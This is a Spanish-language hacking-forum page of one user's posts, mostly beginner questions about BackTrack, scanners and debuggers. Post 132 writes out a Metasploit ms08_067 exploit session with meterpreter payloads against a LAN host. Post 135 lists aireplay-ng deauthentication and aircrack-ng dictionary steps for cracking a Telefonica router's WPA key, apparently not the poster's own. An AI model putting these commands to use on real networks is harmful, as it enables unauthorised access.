elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14]
131  Seguridad Informática / Bugs y Exploits / Re: Sesion con metaexploit en: 19 Mayo 2010, 19:13 pm

#! / que buena informacion que obtienes con openvas ,y me imagino que con nessus es igual .
yo solo uso un fingerprinting que es xprobe2 en backtrack 3 y no encuentro ni el nessus ni el openvas instalado por defecto.

Gracias y mi pregunta es:
???? Cual de las cientos de aplicaciones que tiene el live cd backtrack3 final se puede  usar como scanner de vulnerabilidades
y que obtenga la informacion como lo hace openvas o nessus de forma remota    ;-)
132  Seguridad Informática / Bugs y Exploits / Re: Sesion con metaexploit en: 17 Mayo 2010, 07:26 am
 :D
hola ,tengo el mismo problema y soy novato por favor si alguien puede ayudarme.
yo solo hago click aqui y aya para ver que pasa y si no ...da igual...algo puede salir
#! /los pasos que hice son:
inicie el framework metasploit  msfconsole >nmap -sV 192.168.1.7
//encontre los siguiente puertos disponibles: "un FIREWALL presente" >:(
 /* 445/tcp filtered!open microsoft-ds */
/* 43690 udp filtered|open */

>use windows/smb/ms08_067_netapi
>set RHOST 192.168.1.7
>set PAYLOAD windows/meterpreter/bind_tcp
/* aqui tambien uso reverse_tcp para ver si puedo pasar el firewall */
>set targets $A   // osea el numero del OS
>exploit
 :-(
/* bien es el fin de mi camino y de aqui no paso , me sale un mensaje que
 toda la configuracion esta correcta pero que no puedo obtener la sesion

 mi pregunta es ???????? es el firewall que no me deja pasar o es solo
que hago  algo mal  en los pasos antes indicados  */

 gracias anticipadamente por la respuesta o por la amonestacion si esta me llega

133  Seguridad Informática / Hacking / Re: [ayuda] ABRIR PUERTO ROUTER en: 21 Abril 2010, 17:17 pm

Mil Garcias   Dani--
por el link de tu respuesta #1 ,pude encontrar al fin el user y password de mi router
  :D
134  Seguridad Informática / Hacking / Re: Linux BackTrack 4 en: 17 Abril 2010, 04:43 am

 hola a todos y disculpen por preguntar aqui:
 podria alguien ayudarme , uso backtrack 3 y e creado un fichero de comandos : hola.cpp 
 al ejecutar  g++ -o ejemplo hola.cpp

me sale el siguiente error
/root/hola.cpp:2:3: error: invalid preprocessing directive #fichero
/root/hola.cpp:3: error: expected constructor, destructor, or type conversion before '/' token

 mil gracias anticipadas si alguien al menos me responde

 
135  Seguridad Informática / Wireless en Linux / Re: Modems huawei echolife y wifiway 1.0 o wifislax 3.1 en: 29 Marzo 2010, 18:04 pm
hola a todos  :D
aqui nuevamente para el segundo round contra el modem huawei echolife hg520 con encriptacion wpa psk aes ccmp  de telefonica
los pasos que hice para sacar la clave wireless :
 1-) acercarme fisicamente un poco mas o poner una antena que me de mas potencia   con rate 54 y unos 23pw de mi atheros es suficiente
 2-) ataque A0 : aireplay-ng -0 10 -a macAP -c macCliente ath0
al obtener un handshake usar un diccionario
 3-) aircrack-ng -w dic.lst archive-01.cap
????no encuentras aun la clave.. no hay problema
 4-) zcat all.gz | egrep -v`^#`>dic           defaultwpa
????aun no encuentras la clave
 5-) usa un diccionario de telefonica y listo a mi me funciono de las dos maneras
      by-by


136  Seguridad Informática / Wireless en Linux / Re: Modems huawei echolife y wifiway 1.0 o wifislax 3.1 en: 23 Marzo 2010, 23:36 pm
 :-(
hola a todos , uso backtrack 3 y tengo el mismo problema , usando el aircrack-ng no puedo captar el paquete con el  handshake(0) wpa ccmp psk en el huawei hg520c echolife . sin embargo  en el wireshark aparecen paquetes eapol de los 4 solo aparecen 2  AVISO el router asigna por dhcp a cualquiera que tenga la clave wireless por lo tanto no esta habilitado el filtrado MAC ????cualquier ayuda se agradece
137  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Re: Como conectarse a internet gratis en: 26 Marzo 2009, 19:31 pm

Hola smash88 ?? se podria usar un AP access point D-link qp252 como un wifi para captar redes cercanas o no , como un man_in_middle ?????????
138  Comunicaciones / Dispositivos Móviles (PDA's, Smartphones, Tablets) / Re: Como conectarse a internet gratis en: 12 Marzo 2009, 21:12 pm

HoLa
soy nuevo en el foro, podria alguien ayudarme a conectarme con alegro cdma
Tengo entendido que en tcp/ip debe usar una IP dinamica dada por el Isp y no como dicen unos post mas arriba , el numero a marcar #777 o cual es??  user 095......@.........com.ec   pass: 1.....   ???debe tener servicio wap o no es necesario, debe tener saldo o no , y por ultimo hay que hacer alguna configuracion a la nam o no ??? *3001#12345# nam1-2 
139  Programación / Ingeniería Inversa / OllyDBG 1.10 Full plugins- falta CC3260MT.DLL en: 11 Febrero 2009, 05:36 am
Hola a todos:

Tengo problemas con el ollydbg 1.10  full plugins que lo baje de : http://ricardonarvaja.info/WEB/OTROS/HERRAMIENTAS/L-M-N-O-P

Funciona bien pero al arrancar aparece un mensaje que falta la api  CC3260MT.DLL "la reinstalacion puede solucionar el problema"   ,y no encuentro esta dll por ningun lado ,este mensaje aparecio cuando le puse la ruta en options-appareance-directories-plugins path-browse :(

Alguien podria por favor darme un consejo

Gracias
140  Programación / Ingeniería Inversa / Re: Windows API Reference en: 18 Enero 2009, 04:36 am

MIL GRACIAS - Karmany por el WinApi32 que lo baje del Link , funciona perfectamente
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines